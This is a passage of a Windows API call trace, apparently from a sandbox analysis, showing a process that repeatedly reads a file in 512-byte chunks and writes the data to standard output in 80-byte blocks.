ReadFile (in: hFile=0x54, lpBuffer=0x2eec48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ede38, lpOverlapped=0x0 | out: lpBuffer=0x2eec48*, lpNumberOfBytesRead=0x2ede38*=0x200, lpOverlapped=0x0) returned 1 [0225.663] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.663] GetFileType (hFile=0x4c) returned 0x1 [0225.663] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.663] GetFileType (hFile=0x4c) returned 0x1 [0225.663] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.663] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eec48*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.663] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.664] GetFileType (hFile=0x4c) returned 0x1 [0225.664] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.664] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, 
lpOverlapped=0x0 | out: lpBuffer=0x2eec98*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.664] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.664] GetFileType (hFile=0x4c) returned 0x1 [0225.664] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.664] WriteFile (in: hFile=0x4c, lpBuffer=0x2eece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eece8*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.664] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.664] GetFileType (hFile=0x4c) returned 0x1 [0225.664] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.664] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eed38*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.664] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.664] GetFileType (hFile=0x4c) returned 0x1 [0225.664] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.664] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eed88*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.664] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.664] GetFileType (hFile=0x4c) returned 0x1 [0225.664] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.664] WriteFile (in: hFile=0x4c, lpBuffer=0x2eedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eedd8*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.664] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.664] GetFileType (hFile=0x4c) returned 0x1 [0225.664] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.664] WriteFile (in: hFile=0x4c, lpBuffer=0x2eee28*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: 
lpBuffer=0x2eee28*, lpNumberOfBytesWritten=0x2ede2c*=0x20, lpOverlapped=0x0) returned 1 [0225.664] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.664] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ede18 | out: lpNewFilePointer=0x0) returned 1 [0225.665] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.665] ReadFile (in: hFile=0x54, lpBuffer=0x2eec48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ede38, lpOverlapped=0x0 | out: lpBuffer=0x2eec48*, lpNumberOfBytesRead=0x2ede38*=0x200, lpOverlapped=0x0) returned 1 [0225.665] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.665] GetFileType (hFile=0x4c) returned 0x1 [0225.665] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.665] GetFileType (hFile=0x4c) returned 0x1 [0225.665] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.665] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eec48*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.665] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.665] GetFileType (hFile=0x4c) returned 0x1 [0225.665] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.665] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eec98*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.665] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.665] GetFileType (hFile=0x4c) returned 0x1 [0225.665] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.665] WriteFile (in: hFile=0x4c, lpBuffer=0x2eece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eece8*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.665] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.665] GetFileType (hFile=0x4c) returned 0x1 [0225.665] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0225.665] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eed38*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.665] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.665] GetFileType (hFile=0x4c) returned 0x1 [0225.665] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.665] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eed88*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.665] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.665] GetFileType (hFile=0x4c) returned 0x1 [0225.665] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.666] WriteFile (in: hFile=0x4c, lpBuffer=0x2eedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eedd8*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.666] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.666] GetFileType (hFile=0x4c) returned 0x1 [0225.666] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.666] WriteFile (in: hFile=0x4c, lpBuffer=0x2eee28*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eee28*, lpNumberOfBytesWritten=0x2ede2c*=0x20, lpOverlapped=0x0) returned 1 [0225.666] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.666] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ede18 | out: lpNewFilePointer=0x0) returned 1 [0225.666] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.666] ReadFile (in: hFile=0x54, lpBuffer=0x2eec48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ede38, lpOverlapped=0x0 | out: lpBuffer=0x2eec48*, lpNumberOfBytesRead=0x2ede38*=0x200, lpOverlapped=0x0) returned 1 [0225.666] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.666] 
GetFileType (hFile=0x4c) returned 0x1 [0225.666] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.666] GetFileType (hFile=0x4c) returned 0x1 [0225.666] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.666] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eec48*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.666] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.666] GetFileType (hFile=0x4c) returned 0x1 [0225.666] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.666] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eec98*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.666] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.666] GetFileType (hFile=0x4c) returned 0x1 [0225.666] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.666] WriteFile (in: hFile=0x4c, lpBuffer=0x2eece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eece8*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.666] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.666] GetFileType (hFile=0x4c) returned 0x1 [0225.666] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.666] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eed38*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.667] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.667] GetFileType (hFile=0x4c) returned 0x1 [0225.667] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.667] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eed88*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 
[0225.667] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.667] GetFileType (hFile=0x4c) returned 0x1 [0225.667] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.667] WriteFile (in: hFile=0x4c, lpBuffer=0x2eedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eedd8*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.667] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.667] GetFileType (hFile=0x4c) returned 0x1 [0225.667] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.667] WriteFile (in: hFile=0x4c, lpBuffer=0x2eee28*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eee28*, lpNumberOfBytesWritten=0x2ede2c*=0x20, lpOverlapped=0x0) returned 1 [0225.667] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.667] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ede18 | out: lpNewFilePointer=0x0) returned 1 [0225.667] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.667] ReadFile (in: hFile=0x54, lpBuffer=0x2eec48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ede38, lpOverlapped=0x0 | out: lpBuffer=0x2eec48*, lpNumberOfBytesRead=0x2ede38*=0x200, lpOverlapped=0x0) returned 1 [0225.667] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.667] GetFileType (hFile=0x4c) returned 0x1 [0225.667] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.667] GetFileType (hFile=0x4c) returned 0x1 [0225.667] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.667] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eec48*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.667] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.667] GetFileType (hFile=0x4c) returned 0x1 [0225.667] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.667] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec98*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eec98*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.668] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.668] GetFileType (hFile=0x4c) returned 0x1 [0225.668] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.668] WriteFile (in: hFile=0x4c, lpBuffer=0x2eece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eece8*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.668] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.668] GetFileType (hFile=0x4c) returned 0x1 [0225.668] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.668] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eed38*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.668] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.668] GetFileType (hFile=0x4c) returned 0x1 [0225.668] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.668] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eed88*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.668] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.668] GetFileType (hFile=0x4c) returned 0x1 [0225.668] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.668] WriteFile (in: hFile=0x4c, lpBuffer=0x2eedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eedd8*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.668] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.668] GetFileType (hFile=0x4c) returned 0x1 [0225.668] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.668] WriteFile (in: hFile=0x4c, lpBuffer=0x2eee28*, nNumberOfBytesToWrite=0x20, 
lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eee28*, lpNumberOfBytesWritten=0x2ede2c*=0x20, lpOverlapped=0x0) returned 1 [0225.668] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.668] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ede18 | out: lpNewFilePointer=0x0) returned 1 [0225.668] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.668] ReadFile (in: hFile=0x54, lpBuffer=0x2eec48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ede38, lpOverlapped=0x0 | out: lpBuffer=0x2eec48*, lpNumberOfBytesRead=0x2ede38*=0x200, lpOverlapped=0x0) returned 1 [0225.668] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.668] GetFileType (hFile=0x4c) returned 0x1 [0225.669] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.669] GetFileType (hFile=0x4c) returned 0x1 [0225.669] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.669] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eec48*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.669] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.669] GetFileType (hFile=0x4c) returned 0x1 [0225.669] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.669] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eec98*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.669] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.669] GetFileType (hFile=0x4c) returned 0x1 [0225.669] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.669] WriteFile (in: hFile=0x4c, lpBuffer=0x2eece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eece8*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.669] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.669] GetFileType 
(hFile=0x4c) returned 0x1 [0225.669] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.669] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eed38*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.669] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.669] GetFileType (hFile=0x4c) returned 0x1 [0225.669] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.669] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eed88*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.669] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.669] GetFileType (hFile=0x4c) returned 0x1 [0225.669] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.669] WriteFile (in: hFile=0x4c, lpBuffer=0x2eedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eedd8*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.669] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.669] GetFileType (hFile=0x4c) returned 0x1 [0225.670] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.670] WriteFile (in: hFile=0x4c, lpBuffer=0x2eee28*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eee28*, lpNumberOfBytesWritten=0x2ede2c*=0x20, lpOverlapped=0x0) returned 1 [0225.670] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.670] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ede18 | out: lpNewFilePointer=0x0) returned 1 [0225.670] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.670] ReadFile (in: hFile=0x54, lpBuffer=0x2eec48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ede38, lpOverlapped=0x0 | out: lpBuffer=0x2eec48*, lpNumberOfBytesRead=0x2ede38*=0x200, lpOverlapped=0x0) returned 1 [0225.670] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0225.670] GetFileType (hFile=0x4c) returned 0x1 [0225.670] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.670] GetFileType (hFile=0x4c) returned 0x1 [0225.670] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.670] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eec48*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.670] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.670] GetFileType (hFile=0x4c) returned 0x1 [0225.670] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.670] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eec98*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.670] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.670] GetFileType (hFile=0x4c) returned 0x1 [0225.670] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.670] WriteFile (in: hFile=0x4c, lpBuffer=0x2eece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eece8*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.670] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.670] GetFileType (hFile=0x4c) returned 0x1 [0225.670] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.670] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eed38*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.670] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.670] GetFileType (hFile=0x4c) returned 0x1 [0225.671] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.671] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eed88*, 
lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.671] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.671] GetFileType (hFile=0x4c) returned 0x1 [0225.671] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.671] WriteFile (in: hFile=0x4c, lpBuffer=0x2eedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eedd8*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.671] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.671] GetFileType (hFile=0x4c) returned 0x1 [0225.671] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.671] WriteFile (in: hFile=0x4c, lpBuffer=0x2eee28*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eee28*, lpNumberOfBytesWritten=0x2ede2c*=0x20, lpOverlapped=0x0) returned 1 [0225.671] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.671] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ede18 | out: lpNewFilePointer=0x0) returned 1 [0225.671] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.671] ReadFile (in: hFile=0x54, lpBuffer=0x2eec48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ede38, lpOverlapped=0x0 | out: lpBuffer=0x2eec48*, lpNumberOfBytesRead=0x2ede38*=0x200, lpOverlapped=0x0) returned 1 [0225.671] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.671] GetFileType (hFile=0x4c) returned 0x1 [0225.671] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.671] GetFileType (hFile=0x4c) returned 0x1 [0225.671] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.671] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eec48*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.671] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.671] GetFileType (hFile=0x4c) returned 0x1 [0225.672] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0225.672] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eec98*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.672] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.672] GetFileType (hFile=0x4c) returned 0x1 [0225.672] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.672] WriteFile (in: hFile=0x4c, lpBuffer=0x2eece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eece8*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.672] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.672] GetFileType (hFile=0x4c) returned 0x1 [0225.672] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.672] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eed38*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.672] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.672] GetFileType (hFile=0x4c) returned 0x1 [0225.672] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.672] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eed88*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.672] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.672] GetFileType (hFile=0x4c) returned 0x1 [0225.672] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.672] WriteFile (in: hFile=0x4c, lpBuffer=0x2eedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eedd8*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.672] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.672] GetFileType (hFile=0x4c) returned 0x1 [0225.672] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.672] WriteFile (in: hFile=0x4c, 
lpBuffer=0x2eee28*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eee28*, lpNumberOfBytesWritten=0x2ede2c*=0x20, lpOverlapped=0x0) returned 1 [0225.672] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.672] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ede18 | out: lpNewFilePointer=0x0) returned 1 [0225.673] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.673] ReadFile (in: hFile=0x54, lpBuffer=0x2eec48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ede38, lpOverlapped=0x0 | out: lpBuffer=0x2eec48*, lpNumberOfBytesRead=0x2ede38*=0x200, lpOverlapped=0x0) returned 1 [0225.673] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.673] GetFileType (hFile=0x4c) returned 0x1 [0225.673] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.673] GetFileType (hFile=0x4c) returned 0x1 [0225.673] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.673] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eec48*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.673] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.673] GetFileType (hFile=0x4c) returned 0x1 [0225.673] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.673] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec98*, nNumberOfBytesToWrite=0x50, 